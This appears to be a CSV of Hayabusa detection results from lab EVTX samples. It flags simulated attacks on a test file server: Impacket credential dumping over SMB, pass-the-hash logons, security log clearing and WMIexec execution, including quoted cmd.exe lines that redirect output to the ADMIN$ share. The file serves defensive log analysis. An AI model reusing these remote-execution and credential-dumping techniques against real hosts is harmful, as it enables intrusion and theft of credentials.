2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx"
2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb3084,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb314d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path:  | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx"
2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189df8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.23.9 | LID: 0x189e94,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f62,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189f84,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fa3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer:  | IP Addr: 10.23.123.11 | LID: 0x189fc0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
